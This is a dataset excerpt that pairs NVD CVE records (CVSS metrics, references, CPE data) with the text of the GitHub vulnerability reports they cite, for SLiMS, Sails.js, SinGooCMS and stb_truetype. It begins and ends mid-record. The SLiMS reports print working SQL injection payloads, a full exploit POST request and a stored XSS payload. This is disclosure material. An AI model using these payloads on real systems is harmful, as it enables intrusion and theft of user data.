__libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #5 0x561fa86de70d in _start (/src/stb/Asanttf+0x470d) 0x60f0000000fc is located 13 bytes to the right of 175-byte region [0x60f000000040,0x60f0000000ef) allocated by thread T0 here: #0 0x7f613befae17 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154 #1 0x561fa87051c6 in main /src/stb/ttf.c:26 #2 0x7f613bb2c0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: heap-buffer-overflow /src/stb/include/stb_truetype.h:1313 in stbtt__find_table Shadow bytes around the buggy address: 0x0c1e7fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 =>0x0c1e7fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 07 fa[fa] 0x0c1e7fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3164==ABORTING ``` **Poc** Poc file is [here](https://github.com/Vincebye/Fuzzing/blob/main/10)
heap-buffer-overflow in function stbtt__find_table at stb_truetype.h:1313
https://api.github.com/repos/nothings/stb/issues/1287/comments
1
2022-02-16T15:29:22Z
2022-02-17T06:55:46Z
https://github.com/nothings/stb/issues/1287
1,140,187,875
1,287
3,364
CVE-2021-45791
2022-03-17T11:15:07.537
Slims8 Akasia 8.3.1 is affected by SQL injection in /admin/modules/bibliography/index.php, /admin/modules/membership/member_type.php, /admin/modules/system/user_group.php, and /admin/modules/membership/index.php through the dir parameter. It can be used by remotely authenticated librarian users.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/slims/slims8_akasia/issues/200" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/slims/slims8_akasia/issues/200" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slims:senayan_library_management_system:8.3.1:*:*:*:*:*:*:*", "matchCriteriaId": "D3459EC4-33BA-4FF6-B1AA-630E86795A96", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/slims/slims8_akasia/issues/200
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "slims", "slims8_akasia" ]
Hello, I found some serious bugs in Slims8 Akasia 8.3.1 (latest version). First of all, there is a SQL injection bug. This injection exists in multiple files, and the file where the search keyword $_GET['dir'] is located all has SQL injection. url:[http://localhost/admin/modules/bibliography/index.php?itemID=17&detail=true&ajaxload=1&datatablefld=ISBN%2FISSN&dir=asc](url) ` // change the record sorting if there fld var in URL $_fld_sort = $this->table_ID.'fld'; $_dir = 'ASC'; $_next_dir = 'DESC'; $_sort_dir_info = __('ascendingly'); if (isset($_GET[$_fld_sort]) AND !empty($_GET[$_fld_sort])) { $this->sql_order = 'ORDER BY `'.urldecode($_GET[$_fld_sort]).'` '; // record order direction if (isset($_GET['dir']) AND ($_dir = trim($_GET['dir']))) { if ($_dir == 'DESC') { $_next_dir = 'ASC'; } else { $_next_dir = 'DESC'; $_sort_dir_info = __('descendingly'); } // append sort direction $this->sql_order .= $_dir; } } ` You have escaped the dir string. But in fact it just appends a backslash \ before', "or \. Reference from PHP mysql_real_escape_string Therefore, if my GET variable dir does not contain these characters, sql injection will be triggered. SQL injection demonstration `dir=-test() //When the data table test does not exist, the database name is returned. slims.test` SQL injection demonstration `dir=-user() //When the data table user exists, it returns to the normal page.` Example: [http://localhost/admin/modules/bibliography/index.php?itemID=17&detail=true&ajaxload=1&datatablefld=ISBN%2FISSN&dir=-a()](url) <img width="1178" alt="1" src="https://user-images.githubusercontent.com/18564938/146883462-3c9aa8b1-f197-4598-a8ed-913643b8dc4e.png"> <img width="1107" alt="2" src="https://user-images.githubusercontent.com/18564938/146883650-8d61382e-a0df-473e-acf7-7ec343f536b6.png"> List some pages with SQL injection: `http://localhost/admin/modules/bibliography/index.php?itemID=17&detail=true&ajaxload=1&datatablefld=ISBN%2FISSN&dir=-test() http://localhost/admin/modules/membership/member_type.php?ajaxload=1&datatablefld=Loan+Limit&dir=DESC http://localhost/admin/modules/system/user_group.php?keywords=&datatablefld=Group+Name&dir=DESC http://localhost/admin/modules/membership/index.php?datatablefld=Member+ID&dir=DESC`
[Security Bugs] Multiple Sql Injection
https://api.github.com/repos/slims/slims8_akasia/issues/200/comments
2
2021-12-21T07:05:29Z
2021-12-22T08:45:12Z
https://github.com/slims/slims8_akasia/issues/200
1,085,505,912
200
3,365
CVE-2021-45792
2022-03-17T11:15:07.667
Slims9 Bulian 9.4.2 is affected by Cross Site Scripting (XSS) in /admin/modules/system/custom_field.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/slims/slims9_bulian/issues/122" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/slims/slims9_bulian/issues/122" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slims:senayan_library_management_system:9.4.2:*:*:*:*:*:*:*", "matchCriteriaId": "EDC3FA43-9AED-4115-B41B-61587D7D784F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/slims/slims9_bulian/issues/122
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "slims", "slims9_bulian" ]
**Describe the bug** Storage type xss exists in Custom Field Editor in /admin/modules/system/custom_field.php file. There is no effective defense against the NOTE field, leading to cross-site script attacks. **To Reproduce** Steps to reproduce the behavior: Storage type xss exists in Custom Field Editor in /admin/modules/system/custom_field.php file. There is no effective defense against the NOTE field, leading to cross-site scripting attacks. Administrator login "system" add new "field> fill in cross-site scripting in the NOTE field `(example:'"><svg/onload=alert(document.domain)>)` It will take effect after saving. **Expected behavior** You can insert js scripts to attack. **Screenshots** <img width="1071" alt="3" src="https://user-images.githubusercontent.com/18564938/147060823-4a8328b5-9ea5-400a-80d2-48c4a8828895.png"> <img width="1087" alt="4" src="https://user-images.githubusercontent.com/18564938/147060883-f5af4b94-3587-4dee-9e94-45415050b3eb.png"> **Desktop :** - OS: [MacBook M1] - Browser [Chrome] - Version [96.0.4664.110]
[Security Bug]Stored cross-site script attacks(xss)
https://api.github.com/repos/slims/slims9_bulian/issues/122/comments
1
2021-12-22T08:39:34Z
2025-01-04T07:03:17Z
https://github.com/slims/slims9_bulian/issues/122
1,086,586,652
122
3,366
CVE-2021-44908
2022-03-17T12:15:07.800
SailsJS Sails.js <=1.4.0 is vulnerable to Prototype Pollution via controller/load-action-modules.js, function loadActionModules().
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "https://github.com/Marynk/JavaScript-vulnerability-detection/blob/main/sailsJS%20PoC.zip" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/balderdashy/sails/blob/master/lib/app/private/controller/load-action-modules.js#L32" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/balderdashy/sails/issues/7209" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "https://github.com/Marynk/JavaScript-vulnerability-detection/blob/main/sailsJS%20PoC.zip" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/balderdashy/sails/blob/master/lib/app/private/controller/load-action-modules.js#L32" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/balderdashy/sails/issues/7209" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sailsjs:sails:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "64418401-6896-4887-BEC6-34C9C3E66071", "versionEndExcluding": null, "versionEndIncluding": "1.4.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1321" ]
1321
https://github.com/balderdashy/sails/issues/7209
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "balderdashy", "sails" ]
**Node version**: 12.13.0 **Sails version** _(sails)_: 1.4.0 else-if statement in lines 134-165 https://github.com/balderdashy/sails/blob/master/lib/app/private/controller/load-action-modules.js#L163) is vulnerable to prototype pollution. The object assignment on line 163 may lead to denial of service or property injection if SailsJS based application dynamically controls the value of variable “filePath”. Proof of concept case is demonstrated here: https://github.com/Marynk/JavaScript-vulnerability-detection/tree/main/sailsJS_PoC The CVE Program has assigned the ID CVE-2021-44908 to this issue. This is a record on the [CVE List](https://cve.mitre.org/cve/), which standardizes names for security problems.
Prototype pollution in LoadActionModules() CVE-2021-44908
https://api.github.com/repos/balderdashy/sails/issues/7209/comments
3
2022-03-15T03:02:07Z
2022-03-20T14:17:52Z
https://github.com/balderdashy/sails/issues/7209
1,169,125,354
7,209
3,367
CVE-2021-45793
2022-03-17T12:15:07.843
Slims9 Bulian 9.4.2 is affected by SQL injection in lib/comment.inc.php. User data can be obtained.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/slims/slims9_bulian/issues/123" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/slims/slims9_bulian/issues/123" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slims:senayan_library_management_system:9.4.2:*:*:*:*:*:*:*", "matchCriteriaId": "EDC3FA43-9AED-4115-B41B-61587D7D784F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/slims/slims9_bulian/issues/123
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "slims", "slims9_bulian" ]
SQL injection exists in the lib/comment.inc.php file. There is no effective defense against the comment field, leading to SQL injection attacks. Ordinary user login "find a book" SQL injection attack in the comments (example:`'and/**/1=(updatexml(1,concat(0x3a,(select/**/user())),1) )/**/and/**/'1'='1` ) <img width="934" alt="5" src="https://user-images.githubusercontent.com/18564938/147071549-90380ba8-eeeb-4bb7-86b0-718de1df0f22.png"> <img width="756" alt="6" src="https://user-images.githubusercontent.com/18564938/147071593-bc47a5f7-f068-4c76-b424-a02c954c7eb4.png"> `SQL Injection request: POST /index.php?p=show_detail&id=17 HTTP/1.1 Host: 192.168.31.63 Content-Length: 110 Cache-Control: max-age=0 Origin: http://192.168.31.63 Upgrade-Insecure-Requests: 1 DNT: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3; q=0.9 Referer: http://192.168.31.63/index.php?p=show_detail&id=17 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: admin_logged_in=1; ckCsrfToken=QlUPE9DlsBjESqNjH6x7Mb9y7y7cIl24Tq13u7c6; SenayanMember=do2fk5pq9qdkqo1phadksnm0u9 Connection: close comment='and/**/1=(updatexml(1,concat(0x3a,(select/**/user())),1))/**/and/**/'1'='1 &SaveComment=Save+comment` `Vulnerable code: $_sql = "Select c.comment, m.member_name, c.input_date from comment AS c LEFT JOIN biblio AS b ON b.biblio_id = c.biblio_id LEFT JOIN member AS m ON m.member_id = c.member_id WHERE b.biblio_id =".$_detail_id. "ORDER BY c.last_update DESC"; $commlist = $dbs->query($_sql); if ($commlist) { $_all_recs = $commlist->num_rows; } if ($_all_recs >0) { $_page = ($page -1) * $_recs_each_page; $_sql .= "Limit". $_page. ", ". $_recs_each_page; $commlist = $dbs->query($_sql); $_list_comment .='<div class="comment-found">'. $_all_recs. __(' comments available').'</div>'; while ($_data = $commlist->fetch_assoc()) { $_list_comment .='<div class="comments">'; $_list_comment .='<div class="comment-member">'.$_data['member_name']. __(' at'). $_data['input_date']. __(' write').'</ div>'; $_list_comment .='<div class="comment-content">'. $_data['comment'].'</div>'; $_list_comment .='</div>'; } $_list_comment .='<div class="comment-found">'.simbio_paging::paging($_all_recs, $_recs_each_page, $int_pages_each_set = 10,'','_self').'</div>'; } if (ISSET($_SESSION['mid'])) { // Comment form $_forms ='<form method="post" action="index.php?p=show_detail&id='.$_detail_id.'" class="comment-form">'; $_forms .= simbio_form_element::textField('textarea','comment','','placeholder="Add your comment" class="comment-input form-control"').'<br />'; $_forms .='<input type="submit" name="SaveComment" value="Save comment" class="s-btn btn btn-primary">'; $_forms .= \Volnix\CSRF\CSRF::getHiddenInputString(); $_forms .='</form>'; return $_list_comment.$_forms;`
[Security Bugs] Sql Injection
https://api.github.com/repos/slims/slims9_bulian/issues/123/comments
1
2021-12-22T09:49:53Z
2022-12-23T03:52:33Z
https://github.com/slims/slims9_bulian/issues/123
1,086,645,532
123
3,368
CVE-2021-45794
2022-03-17T12:15:07.883
Slims9 Bulian 9.4.2 is affected by SQL injection in /admin/modules/system/backup.php. User data can be obtained.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/slims/slims9_bulian/issues/124" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/slims/slims9_bulian/issues/124" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slims:senayan_library_management_system:9.4.2:*:*:*:*:*:*:*", "matchCriteriaId": "EDC3FA43-9AED-4115-B41B-61587D7D784F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/slims/slims9_bulian/issues/124
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "slims", "slims9_bulian" ]
SQL injection exists in the /admin/modules/system/backup.php file. There is no effective defense against the comment field, leading to SQL injection attacks. The link is: `http://192.168.31.63/admin/modules/system/backup.php?action=download&id=1` Vulnerable parameter `id` SQL injection payload `Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: action=download&id=2 OR NOT 8551=8551 ` `Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: action=download&id=2 AND (SELECT 7623 FROM (SELECT(SLEEP(5)))zpJu)` <img width="558" alt="7" src="https://user-images.githubusercontent.com/18564938/147107829-026df7bf-f459-43e8-8388-4508075483bc.png"> The problematic code `if(isset($_GET['action']) && isset($_GET['id']) && $_GET['action'] == 'download'){ $id = utility::filterData('id', 'get', true, true, true); $_q = $dbs->query("SELECT backup_file FROM backup_log WHERE backup_log_id=".$id); $path = $_q->fetch_row()[0];`
[Security Bugs] SQL Injection
https://api.github.com/repos/slims/slims9_bulian/issues/124/comments
1
2021-12-22T14:29:35Z
2022-12-23T03:51:13Z
https://github.com/slims/slims9_bulian/issues/124
1,086,875,971
124
3,369
CVE-2022-0749
2022-03-17T12:15:07.970
This affects all versions of package SinGooCMS.Utility. The socket client in the package can pass in the payload via the user-controllable input after it has been established, because this socket client transmission does not have the appropriate restrictions or type bindings for the BinaryFormatter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.4, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.2, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/SinGooCMS/SinGooCMSUtility/blob/master/SinGooCMS.Utility/Net/SocketClient.cs" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/SinGooCMS/SinGooCMSUtility/issues/1" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-DOTNET-SINGOOCMSUTILITY-2312979" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/SinGooCMS/SinGooCMSUtility/blob/master/SinGooCMS.Utility/Net/SocketClient.cs" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/SinGooCMS/SinGooCMSUtility/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-DOTNET-SINGOOCMSUTILITY-2312979" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:singoo:singoocms.utility:-:*:*:*:*:*:*:*", "matchCriteriaId": "83FCBCF4-33D1-4367-946B-2C2DB1152C76", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/SinGooCMS/SinGooCMSUtility/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "SinGooCMS", "SinGooCMSUtility" ]
### Risk Class:SinGooCMSUtility/SinGooCMS.Utility/Net/SocketClient.cs ![image](https://user-images.githubusercontent.com/55079235/145212639-50a55558-044a-49c4-8cbf-077f938a6ae6.png) #### Set up socket communication server : ![image](https://user-images.githubusercontent.com/55079235/145215068-2e9d8530-78b7-4aef-ab50-800b24fd986f.png) client : ![image](https://user-images.githubusercontent.com/55079235/145215080-b3e46a77-969f-460d-b49e-01e8d79f9d59.png) #### Constructing the payload The ReceiveVarData() method internally first calls the ReceiveFixData() method to read the packet header (8 bytes) of the socket object information, and then calls the GetPacketLength() method to read the length of the bytes in the packet header (int type) The ReceiveFixData() method will first intercept 8 bytes of information, so 8 bytes must be added before the original payload when constructing the POC. The GetPacketLength() method reads the packet header information, i.e. the 8 bytes of information needs to contain the byte length (int type) of the original payload, while intercepting the int data type before the ' * ' ending. Also the Payload source code is converted to a byte array length of 3110 bytes. A local test of the GetPacketLength() method shows that the 8 bytes of information could be "3110 ****". Int(3110) is the byte length of the original payload. #### Simulating the transmission of messages to a socket client POC implementation using a controlled data transfer from the server to the socket client, i.e. a set payload. ![image](https://user-images.githubusercontent.com/55079235/145216478-5c594881-641c-4d7f-a07b-caf0550a7724.png) ![image](https://user-images.githubusercontent.com/55079235/145216488-fd3304c5-bf00-4c04-94f2-a2e25178e3d3.png) ![image](https://user-images.githubusercontent.com/55079235/145216494-1cb5b985-89ef-417e-8e1a-1846d26a9d83.png)
Vulnerability Report: BinaryFormatter security vulnerability
https://api.github.com/repos/SinGooCMS/SinGooCMSUtility/issues/1/comments
1
2021-12-08T13:29:42Z
2021-12-08T13:47:31Z
https://github.com/SinGooCMS/SinGooCMSUtility/issues/1
1,074,413,488
1
3,370
CVE-2022-21221
2022-03-17T12:15:08.087
The package github.com/valyala/fasthttp before 1.34.0 are vulnerable to Directory Traversal via the ServeFile function, due to improper sanitization. It is possible to be exploited by using a backslash %5c character in the path. **Note:** This security issue impacts Windows users only.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 3.6, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, 